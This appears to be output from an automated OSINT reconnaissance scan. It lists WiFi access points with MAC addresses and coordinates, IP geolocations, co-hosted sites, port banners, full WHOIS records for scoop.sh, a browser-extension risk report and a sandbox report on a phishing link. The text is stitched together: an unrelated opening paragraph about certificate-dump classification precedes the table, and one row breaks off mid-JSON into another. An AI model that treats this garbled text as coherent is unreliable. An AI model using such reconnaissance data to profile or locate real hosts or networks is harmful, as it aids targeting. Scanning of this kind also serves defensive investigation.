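Run it directly to print the classification of each dump. The point of same_issuance is that a precertificate dump is not evidence of a second certificate, and the point of valid_at is that hostnames mined from an expired certificate describe the host as it was at issuance, which is one reason the derived names appear as unresolved at scan time.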
| 2023-05-12 03:00:49 | Co-Hosted Site | No | HackerTarget | 2 | 0 | 2 | 0 | None | 0-fog.github.io | 185.199.111.153 |
| 2023-05-12 02:50:19 | Physical Location | No | ipstack | 0 | 0 | 3 | 0 | None | United States | 104.21.71.14 |
| 2023-05-12 03:18:49 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | myLGNet_411 (Net ID: 00:01:36:45:14:AA) | 34.0544, -118.244 |
| 2023-05-12 02:50:19 | Physical Location | No | ipstack | 0 | 0 | 3 | 0 | None | United States | 172.67.168.252 |
| 2023-05-12 02:44:49 | Raw Data from RIRs | No | CRXcavator | 0 | 0 | 1 | 0 | None | [{"platform": "Chrome", "version": "1.6.1", "data": {"webstore": {"website": "https://github.com/jawil/GayHub", "rating": 4.6923075, "privacy_policy": "", "last_updated": "2018-02-20", "name": "GayHub", "price": "", "offered_by": "", "support_site": "", "version": "", "address": "", "short_description": "An awesome chrome extension for github", "permission_warnings": ["Your data on github.com and gist.github.com", "Your tabs and browsing activity"], "users": 3000, "size": "475KiB", "type": "Extension", "email": "", "rating_users": 26, "icon": "https://lh3.googleusercontent.com/rZ8V_inU3Be2PxnPEyV9srR3G_5mJ_618v81YKqluedhhRG1boWeD5rZHFFN4VI0_7dmWXBueXjQBFnTN4kAfCmNbQ=w128-h128-e365-rj-sc0x00ffffff"}, "risk": {"webstore": {"privacy_policy": 1, "last_updated": 5, "users": 1, "email": 1, "address": 1, "total": 11, "support_site": 1, "rating_users": 1}, "metadata": {}, "total": 403, "csp": {"script-src": 1, "total": 377, "object-src": 1}, "permissions": {"total": 15}}, "related": {"opljiobgnagdjikipnagigiacllolpaj": {"rating": 4.25, "users": 2000, "platform": "", "short_description": "This extension shows the external&internal IP addresses when you click the extension icon. 
https://helloacm.com/what-is-my-ip/", "icon": "https://lh3.googleusercontent.com/OurtCVWPKROdy5kH63tDPxXBL3vvou2I83sUOA-jLe-YqgroIGs-lbPy9vGBfqswfTrgxpEXmdFzqLlxFxWYXn-dzQ=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 8, "name": "Show My IP Addresses (External and Local)"}, "lfjcgcmkmjjlieihflfhjopckgpelofo": {"rating": 4.6489363, "users": 10000, "platform": "", "short_description": "Manage your gas code with github/github enterprise/bitbucket/gitlab", "icon": "https://lh3.googleusercontent.com/JQyTyCU3aXSfpzGXEYZDelP5ybdWSGiUk9ji6YW512-z3rHuyqaLizFmvf82tfGK3yNNtNmEagNnestoBypiYfWg=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 94, "name": "Google Apps Script GitHub Assistant"}, "lomkpheldlbkkfiifcbfifipaofnmnkn": {"rating": 4.6296296, "users": 30000, "platform": "", "short_description": "Code Cola is a chrome extension for editing online pages' css style visually.", "icon": "https://lh3.googleusercontent.com/GQWBPNAC8Q7LdRt-cnVK4JrImzSNY2HVSNWgsZlup1YaXFLx5VVr7fa34WEvV0cPv-zalCCQ5_3ck7IHBxrhgsGuKA=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 189, "name": "Code Cola"}, "deeboegbjcnfgidliakhpoapnpomphji": {"rating": 3.857143, "users": 1000000, "platform": "", "short_description": "Toolbar for web development", "icon": "https://lh3.googleusercontent.com/di-L2xSddlNgutumTJHpRrMBo5ZbzogHp923sYoHpOhfY4MH4x6Oq_XAuc3m1bzp3wU2btfH=w128-h128-e365", "rating_users": 21, "name": "Web Developer Toolbar"}, "bhghoamapcdpbohphigoooaddinpkbai": {"rating": 3.9225047, "users": 3000000, "platform": "", "short_description": "Authenticator generates two-factor authentication codes in your browser.", "icon": "https://lh3.googleusercontent.com/LEgohRXYMasRoU-SXiJrkH_LsMMMgpKERWbOCpofID-cbbtKm4DjovRnDo2eiyvWBGcOUSjvQmBPOGKJW7g8y1aJCw=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 1613, "name": "Authenticator"}, "dnkhdiodfglfckibnfcjbgddcgjgkacd": {"rating": 4.6666665, "users": 2000, "platform": "", "short_description": "a command launcher with extension management/app 
launcher/tab management/history search/alfred", "icon": "https://lh3.googleusercontent.com/SIB0XUxRArOkDoQEj3OXtt3X8-NphqgNyXwHNI6TBaIFKYOn-cXNakkxFMXIQd7qOQO76QZ-K21qwfvSnDgJHEW-=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 45, "name": "Steward Plus"}, "pdnaboncdpkapafcfbajadgknpfjegod": {"rating": 4.7608695, "users": 10000, "platform": "", "short_description": "This Chrome Extension adds audio download links for several online dictionaries.", "icon": "https://lh3.googleusercontent.com/dZbwAzFrBHjjcXq2qVL6TJl4_3UOU4fwEsYqAnzmpzYb00qLThXY3SzkoHQtHViLN5XnPs-MTlGXPpQCf0v-VRM_ng=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 92, "name": "Download Audio of Online Dictionaries"}, "mdolidbiejfnaejdoagjacapnichoccj": {"rating": 4.1538463, "users": 6000, "platform": "", "short_description": "Change every web page style, darken background color and brighten font color, prevent users see high brightness web page.", "icon": "https://lh3.googleusercontent.com/1JZIBrNIhozVuMip1G94Dh_fUaA4_Z-9YPGOHIyPleEphEcxtYZ7P41-tokT9f0iOferGYTOLdI4flseKdEsHZjy8g=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 39, "name": "Darker Background Brighter Font"}, "gcalenpjmijncebpfijmoaglllgpjagf": {"rating": 4.7571106, "users": 600000, "platform": "", "short_description": "Change the web at will with userscripts", "icon": "https://lh3.googleusercontent.com/gi92Uq5ScxlMrm9WbsCN09d8KCLZ9JXgc8sWr4qCTu7EGFD9jcVAI3zQvTC-MDBBLpLO8Rbj7knyQy77YXGFghxtAQ=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 4430, "name": "Tampermonkey BETA"}, "effllpcngdchldpedlbehnipblaamnng": {"rating": 5, "users": 88, "platform": "", "short_description": "Blocking offending scripts related to the GitHub DDoS incident, annoying messages and being exploited as source of attack.", "icon": "https://ssl.gstatic.com/chrome/webstore/images/thumb_1280x800.png", "rating_users": 9, "name": "Blockdu"}, "cjpalhdlnbpafiamejdnhcphjbkeiagm": {"rating": 4.6761365, "users": 10000000, "platform": "", "short_description": "Finally, an 
efficient blocker. Easy on CPU and memory.", "icon": "https://lh3.googleusercontent.com/rrgyVBVte7CfjjeTU-rCHDKba7vtq-yn3o8-10p5b6QOj_2VCDAO3VdggV5fUnugbG2eDGPPjoJ9rsiU_tUZBExgLGc=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 26400, "name": "uBlock Origin"}, "padekgcemlokbadohgkifijomclgjgif": {"rating": 4.6292105, "users": 2000000, "platform": "", "short_description": "Manage and switch between multiple proxies quickly & easily.", "icon": "https://lh3.googleusercontent.com/Ar6pRol9XdP7QSJdQPlWUngT111eg-HCjcavM7DVg3UUIuICRhvL6_v0UcIaNt3xLuBsP0_EUww2RftpnWzYgv_MFA=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 3711, "name": "Proxy SwitchyOmega"}, "mnloefcpaepkpmhaoipjkpikbnkmbnic": {"rating": 3.7554348, "users": 100000, "platform": "", "short_description": "Set proxy for Google Chrome browser", "icon": "https://lh3.googleusercontent.com/PkscN0Tmyvc2QN9fac507RxloPLUmpt0XleReFKtefpg_BLAF7w2raCsZqDcpxAlARfIRg4r2Hv9FMM6glQufRCz3bg=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 184, "name": "Proxy Helper"}, "bgjfekefhjemchdeigphccilhncnjldn": {"rating": 4.6003976, "users": 90000, "platform": "", "short_description": "A customizable web browser extension that enhances productivity and efficiency through the use of mouse.", "icon": "https://lh3.googleusercontent.com/r8NbCimEmdt_Y_rN_qvBygGXqQZZuktE3iVsqPg2PDNtH0sLFIMTKIhitG0nRYi1fhOTqkhLJOV7YfGgZKQR8wpPKQ=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 1509, "name": "smartUp Gestures"}, "giompennnhheakjcnobejbnjgbbkmdnd": {"rating": 3.9375, "users": 10000, "platform": "", "short_description": "Unites Local Storage, Session Storage and Cookie in one place. 
Powerful functions with intuitive and concise UI.", "icon": "https://lh3.googleusercontent.com/iQU5omt0D6V3VkW961Xw7PchpmSE57ELnxy2bFv65046rzzF3oMOW5wdMQDoraJZPKkzYPpxoBPPoewZ3V1J75o=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 112, "name": "Swoosh Cookie and Local Storage Specialist"}, "ehnambpmkdhopilaccgfmojilolcglhn": {"rating": 3.9767442, "users": 4000, "platform": "", "short_description": "View markdown file in Chrome.", "icon": "https://lh3.googleusercontent.com/FU0pA5x7SMXMsTaPqfs-gQ3Wizxi4cAYd2oVstoXb4pj2d3QqrPkYZ0tGrWn9YYhNNO18j1QsXMgMDGkU5-oxaAQ4w=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 43, "name": "MarkView"}, "aajodjghehmlpahhboidcpfjcncmcklf": {"rating": 4.5122952, "users": 20000, "platform": "", "short_description": "A powerful Extensions Manager and Userscript Manager with many unique features", "icon": "https://lh3.googleusercontent.com/p8_fd7TENaa2HASn2bHS7O2cwGdcXnyJr0Q7Kjxlqt_G5ralSx93hBvhME4UrXpSWDCp-zdPrwuqf_EgyiQPMIt8gg=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 244, "name": "NooBoss"}, "ljjpkibacifkfolehlgaolibbnlapkme": {"rating": 3.5555556, "users": 5000, "platform": "", "short_description": "Assistant for get HTTP ONLY Cookies.", "icon": "https://lh3.googleusercontent.com/zZPUPORBzI7kmAkRFkyjtrLiM17p37HeJGNTKVPfY_IaMjX3BUgpiQXtA2UWrompAqK_E-ixFfU=w128-h128-e365", "rating_users": 18, "name": "Cookies Get Assistant"}, "kaodcnpebhdbpaeeemkiobcokcnegdki": {"rating": 4.387755, "users": 10000, "platform": "", "short_description": "Gives you approximate count of lines of code on GitHub", "icon": "https://lh3.googleusercontent.com/wVtUFY8eOOwpsblTcFWpOmQt4yB2BF3aVumaIgMZMf_L6i9ynhcGdXdI7f256COTYOzhxvWGJLcelzBm_5-jq3Y8=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 49, "name": "GitHub Gloc"}, "clngdbkpkpeebahjckkjfobafhncgmne": {"rating": 4.5206184, "users": 600000, "platform": "", "short_description": "Redesign the web with Stylus, a user styles manager. 
Stylus allows you to easily install themes and skins for many popular sites.", "icon": "https://lh3.googleusercontent.com/2K8pc_5-2DkPam9b3oAWoITZ7IuIz68A5a8Ssg2_MNNHTPWPOPSBVTFdTmeVu9hi8GJxpKbvTekgwpeyGV6vXyBKH80=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 970, "name": "Stylus"}, "fpnknfakcmgkbhccgpgnbaddggjligol": {"rating": 4.7973566, "users": 8000, "platform": "", "short_description": "A handful player built for easy use in youku. \n\nOpen source\uff1ahttps://github.com/esterTion/Youku-HTML5-Player", "icon": "https://lh3.googleusercontent.com/I_gHk0mIY6XM0RyRno2WO0rsH3VDOwVf1rUKy4E88kDpm5b3Yslv1d3I1qQL4318c8g0gYqLuCZhSDFtJ6N3WP_46Q=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 227, "name": "Yet Another Player for Youku"}, "baggcehellihkglakjnmnhpnjmkbmpkf": {"rating": 4.5283017, "users": 9000, "platform": "", "short_description": "Missing mate of GitHub, making single file download effortless and with more features", "icon": "https://lh3.googleusercontent.com/lu8gjeuKCYW846Y-l8tt4PulU4R3TBXqe0FDwmve_DhHD5RDuf6lUps2d0isFU-WLzjgrXZ5PQ=w128-h128-e365", "rating_users": 53, "name": "Octo Mate"}, "nkbihfbeogaeaoehlefnkodbefgpgknn": {"rating": 3.2891767, "users": 10000000, "platform": "", "short_description": "An Ethereum Wallet in your Browser", "icon": "https://lh3.googleusercontent.com/QW0gZ3yugzXDvTANa5-cc1EpabQ2MGnl6enW11O6kIerEaBQGOhgyUOvhRedndD9io8RJMmJZfIXq1rMxUsFHS2Ttw=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 3012, "name": "MetaMask"}, "klbibkeccnjlkjkiokjod | ayhu.xyz |
| 2023-05-12 03:31:58 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.97.0:443 | 188.114.97.0/24 |
| 2023-05-12 03:18:57 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | pancakes (Net ID: 00:00:48:67:6D:D1) | 37.780462,-122.390564 |
| 2023-05-12 03:33:47 | Raw File Meta Data | No | Binary String Extractor | 0 | 0 | 4 | 0 | None | [printable-string residue from the PNG's compressed IDAT chunks; no readable metadata] | https://pics.battleb0t.xyz/images/kappi_1.png |
| 2023-05-12 03:01:07 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.117): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | Bitchute (Category: political)
https://www.bitchute.com/channel/login/ | login |
| 2023-05-12 03:18:56 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | ProCare-Guest (Net ID: 00:01:21:1C:30:F0) | 37.7813933,-122.3918002 |
| 2023-05-12 03:00:53 | Co-Hosted Site | No | HackerTarget | 2 | 0 | 2 | 0 | None | 002evapey.github.io | 185.199.111.153 |
| 2023-05-12 03:18:49 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | 2WIRE119 (Net ID: 00:02:2D:68:85:12) | 34.0544, -118.244 |
| 2023-05-12 02:55:11 | Open TCP Port Banner | No | Censys | 0 | 0 | 2 | 0 | None | HTTP/1.1 401 Unauthorized
Date: <REDACTED>
Server: cPanel
Persistent-Auth: false
Host: 87.248.157.102:2080
Cache-Control: no-cache, no-store, must-revalidate, private
Connection: close
Vary: Accept-Encoding
WWW-Authenticate: Basic realm="Horde DAV Server"
Content-Encoding: gzip
Content-Length: 52
Content-Type: text/html; charset="utf-8"
Expires: Fri, 01 Jan 1990 00:00:00 GMT
| 87.248.157.102 |
| 2023-05-12 02:46:04 | Physical Location | No | MetaDefender | 0 | 0 | 3 | 0 | None | Jacksonville, United States | 64.226.81.43 |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 4 | 0 | None | cross-origin-embedder-policy: require-corp | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=5wRiK8by2KiigHlJJ8noI6lNWOYgr9ak0HIrPyPmGPMwmKjHbETJvR65ezUzo71EC3GA4BfzhzY9gQo4xaqCIHUyEDhgk9fWUlDfKgViUJ%2BMTfsujmxXQsTRpQ%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 02:54:13 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f6036feab195d-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 03:24:50 | Country | No | Country Name Extractor | 0 | 0 | 5 | 0 | None | Australia | Domain Name: scoop.sh
Registry Domain ID: 688a2dc7e3804150a8a7bd65025fc26d-DONUTS
Registrar WHOIS Server: whois.gandi.net
Registrar URL: https://www.gandi.net
Updated Date: 2022-05-25T08:13:34Z
Creation Date: 2013-06-20T11:02:06Z
Registry Expiry Date: 2023-06-20T11:02:06Z
Registrar: Gandi SAS
Registrar IANA ID: 81
Registrar Abuse Contact Email: abuse@support.gandi.net
Registrar Abuse Contact Phone: +33.170377661
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registry Registrant ID: REDACTED FOR PRIVACY
Registrant Name: REDACTED FOR PRIVACY
Registrant Organization: StudyStays
Registrant Street: REDACTED FOR PRIVACY
Registrant City: REDACTED FOR PRIVACY
Registrant State/Province: QLD
Registrant Postal Code: REDACTED FOR PRIVACY
Registrant Country: AU
Registrant Phone: REDACTED FOR PRIVACY
Registrant Phone Ext: REDACTED FOR PRIVACY
Registrant Fax: REDACTED FOR PRIVACY
Registrant Fax Ext: REDACTED FOR PRIVACY
Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registry Admin ID: REDACTED FOR PRIVACY
Admin Name: REDACTED FOR PRIVACY
Admin Organization: REDACTED FOR PRIVACY
Admin Street: REDACTED FOR PRIVACY
Admin City: REDACTED FOR PRIVACY
Admin State/Province: REDACTED FOR PRIVACY
Admin Postal Code: REDACTED FOR PRIVACY
Admin Country: REDACTED FOR PRIVACY
Admin Phone: REDACTED FOR PRIVACY
Admin Phone Ext: REDACTED FOR PRIVACY
Admin Fax: REDACTED FOR PRIVACY
Admin Fax Ext: REDACTED FOR PRIVACY
Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registry Tech ID: REDACTED FOR PRIVACY
Tech Name: REDACTED FOR PRIVACY
Tech Organization: REDACTED FOR PRIVACY
Tech Street: REDACTED FOR PRIVACY
Tech City: REDACTED FOR PRIVACY
Tech State/Province: REDACTED FOR PRIVACY
Tech Postal Code: REDACTED FOR PRIVACY
Tech Country: REDACTED FOR PRIVACY
Tech Phone: REDACTED FOR PRIVACY
Tech Phone Ext: REDACTED FOR PRIVACY
Tech Fax: REDACTED FOR PRIVACY
Tech Fax Ext: REDACTED FOR PRIVACY
Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Name Server: ns-1530.awsdns-63.org
Name Server: ns-604.awsdns-11.net
Name Server: ns-308.awsdns-38.com
Name Server: ns-1776.awsdns-30.co.uk
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2023-05-12T03:12:12Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
Terms of Use: Access to WHOIS information is provided to assist persons in determining the contents of a domain name registration record in the registry database. The data in this record is provided by Identity Digital or the Registry Operator for informational purposes only, and accuracy is not guaranteed. This service is intended only for query-based access. You agree that you will use this data only for lawful purposes and that, under no circumstances will you use this data to (a) allow, enable, or otherwise support the transmission by e-mail, telephone, or facsimile of mass unsolicited, commercial advertising or solicitations to entities other than the data recipient's own existing customers; or (b) enable high volume, automated, electronic processes that send queries or data to the systems of Registry Operator, a Registrar, or Identity Digital except as reasonably necessary to register domain names or modify existing registrations. When using the Whois service, please consider the following: The Whois service is not a replacement for standard EPP commands to the SRS service. Whois is not considered authoritative for registered domain objects. The Whois service may be scheduled for downtime during production or OT&E maintenance periods. Queries to the Whois services are throttled. If too many queries are received from a single IP address within a specified time, the service will begin to reject further queries for a period of time to prevent disruption of Whois service access. Abuse of the Whois system through data mining is mitigated by detecting and limiting bulk query access from single sources. Where applicable, the presence of a [Non-Public Data] tag indicates that such data is not made publicly available due to applicable data privacy laws or requirements. Should you wish to contact the registrant, please refer to the Whois records available through the registrar URL listed above. 
Access to non-public data may be provided, upon request, where it can be reasonably confirmed that the requester holds a specific legitimate interest and a proper legal basis for accessing the withheld data. Access to this data provided by Identity Digital can be requested by submitting a request via the form found at https://www.identity.digital/about/policies/whois-layered-access/. The Registrar of Record identified in this output may have an RDDS service that can be queried for additional information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Identity Digital Inc. and Registry Operator reserve the right to modify these terms at any time. By submitting this query, you agree to abide by this policy.
Domain Name: scoop.sh
Registry Domain ID: UNDEF-ROID
Registrar WHOIS Server: whois.gandi.net
Registrar URL: http://www.gandi.net
Updated Date: 2023-04-21T08:07:40Z
Creation Date: 2013-06-20T09:02:06Z
Registrar Registration Expiration Date: 2023-06-20T11:02:06Z
Registrar: GANDI SAS
Registrar IANA ID: 81
Registrar Abuse Contact Email: abuse@support.gandi.net
Registrar Abuse Contact Phone: +33.170377661
Reseller:
Domain Status: clientTransferProhibited http://www.icann.org/epp#clientTransferProhibited
Domain Status:
Domain Status:
Domain Status:
Domain Status:
Registry Registrant ID: REDACTED FOR PRIVACY
Registrant Name: REDACTED FOR PRIVACY
Registrant Organization: StudyStays
Registrant Street: REDACTED FOR PRIVACY
Registrant City: REDACTED FOR PRIVACY
Registrant State/Province:
Registrant Postal Code: REDACTED FOR PRIVACY
Registrant Country: AU
Registrant Phone: REDACTED FOR PRIVACY
Registrant Phone Ext:
Registrant Fax: REDACTED FOR PRIVACY
Registrant Fax Ext:
Registrant Email: 09e034915a16543e65fa494a6f2d5f65-1767633@contact.gandi.net
Registry Admin ID: REDACTED FOR PRIVACY
Admin Name: REDACTED FOR PRIVACY
Admin Organization: REDACTED FOR PRIVACY
Admin Street: REDACTED FOR PRIVACY
Admin City: REDACTED FOR PRIVACY
Admin State/Province: REDACTED FOR PRIVACY
Admin Postal Code: REDACTED FOR PRIVACY
Admin Country: REDACTED FOR PRIVACY
Admin Phone: REDACTED FOR PRIVACY
Admin Phone Ext:
Admin Fax: REDACTED FOR PRIVACY
Admin Fax Ext:
Admin Email: 09e034915a16543e65fa494a6f2d5f65-1767633@contact.gandi.net
Registry Tech ID: REDACTED FOR PRIVACY
Tech Name: REDACTED FOR PRIVACY
Tech Organization: REDACTED FOR PRIVACY
Tech Street: REDACTED FOR PRIVACY
Tech City: REDACTED FOR PRIVACY
Tech State/Province: REDACTED FOR PRIVACY
Tech Postal Code: REDACTED FOR PRIVACY
Tech Country: REDACTED FOR PRIVACY
Tech Phone: REDACTED FOR PRIVACY
Tech Phone Ext:
Tech Fax: REDACTED FOR PRIVACY
Tech Fax Ext:
Tech Email: 09e034915a16543e65fa494a6f2d5f65-1767633@contact.gandi.net
Name Server: NS-604.AWSDNS-11.NET
Name Server: NS-1776.AWSDNS-30.CO.UK
Name Server: NS-308.AWSDNS-38.COM
Name Server: NS-1530.AWSDNS-63.ORG
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
DNSSEC: Unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-12T03:12:12Z <<<
For more information on Whois status codes, please visit
https://www.icann.org/epp
Reseller Email:
Reseller URL:
Personal data access and use are governed by French law, any use for the purpose of unsolicited mass commercial advertising as well as any mass or automated inquiries (for any intent other than the registration or modification of a domain name) are strictly forbidden. Copy of whole or part of our database without Gandi's endorsement is strictly forbidden.
A dispute over the ownership of a domain name may be subject to the alternate procedure established by the Registry in question or brought before the courts.
For additional information, please contact us via the following form:
https://www.gandi.net/support/contacter/mail/
|
| 2023-05-12 03:08:46 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 3 | 0 | None | 104.196.30.215 | 104.196.30.220 |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | infinity2 (Net ID: 00:06:25:DA:3E:86) | 33.6170672,-111.90564645297056 |
| 2023-05-12 02:51:22 | Malicious Co-Hosted Site | Yes | VirusTotal | 0 | 1 | 3 | 0 | None | VirusTotal [netlify.app]
https://www.virustotal.com/en/domain/netlify.app/information/ | netlify.app |
| 2023-05-12 03:18:56 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | ToddNet (Net ID: 00:01:24:F2:5E:43) | 37.7813933,-122.3918002 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | MobileInternet (Net ID: 00:02:B3:AE:FA:18) | 50.1188, 8.6843 |
| 2023-05-12 02:48:14 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [u'phishing'], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'https://llink.to/?u=https%3A%2F%2Freadymag.com%2Fu2462346896%2F4244462%2F', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_bc0_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_bc0_IESQMMUTEX_0_303"\n "IsoScope_bc0_IESQMMUTEX_0_331"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "IsoScope_bc0_IESQMMUTEX_0_519"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3008"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "Local\\ZonesCacheCounterMutex"\n "UpdatingNewTabPageData"\n "IsoScope_bc0_ConnHashTable<3008>_HashTable_Mutex"\n "Local\\VERMGMTBlockListFileMutex"\n "IsoScope_bc0_IE_EarlyTabStart_0xdec_Mutex"\n "Local\\ZonesLockedCacheCounterMutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3008"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, 
u'description': u'"185.199.110.153:443"\n "172.66.40.106:443"\n "52.16.183.191:443"\n "35.186.254.174:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"api.salesflare.com"\n "llink.to"\n "readymag.com"\n "track.salesflare.com"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "TarBAD.tmp" as clean (type is "data")\n Antivirus vendors marked dropped file "TarB9B.tmp" as clean (type is "data")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"CabBAC.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 63843 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%TEMP%\\CabBAC.tmp]- [targetUID: 00000000-00003240]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data Windows 2000/XP setup 63843 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00003240]\n "CabB9A.tmp" has type "Microsoft 
